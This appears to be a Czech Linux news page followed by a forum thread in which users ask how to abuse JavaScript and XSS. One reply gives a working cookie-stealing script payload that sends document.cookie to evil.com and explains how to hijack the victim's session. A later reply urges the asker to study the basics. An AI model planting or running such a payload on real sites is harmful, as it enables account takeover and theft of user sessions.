Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.
Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.
Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových
… více »Richard Stallman přednáší ve středu 7. května od 16:30 na Technické univerzitě v Liberci o vlivu technologií na svobodu. Přednáška je určená jak odborné tak laické veřejnosti.
Jean-Baptiste Mardelle se v příspěvku na blogu rozepsal o novinkám v nejnovější verzi 25.04.0 editoru videa Kdenlive (Wikipedie). Ke stažení také na Flathubu.
TmuxAI (GitHub) je AI asistent pro práci v terminálu. Vyžaduje účet na OpenRouter.
Byla vydána nová verze R14.1.4 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání. Podrobný přehled v Changelogu.
Bylo vydáno OpenBSD 7.7. Opět bez písničky.
V Tiraně proběhl letošní Linux App Summit (LAS) (Mastodon). Zatím nesestříhané videozáznamy přednášek jsou k dispozici na YouTube.
Tiskni
Sdílej:
Můžu pomocí javascriptu zobrazit index.php?Javascript běží u klienta - v prohlížeči. Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.
<script> location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; </script>Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad. ..ale je to lamarna .) BTW jde to i na abclinuxu
Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.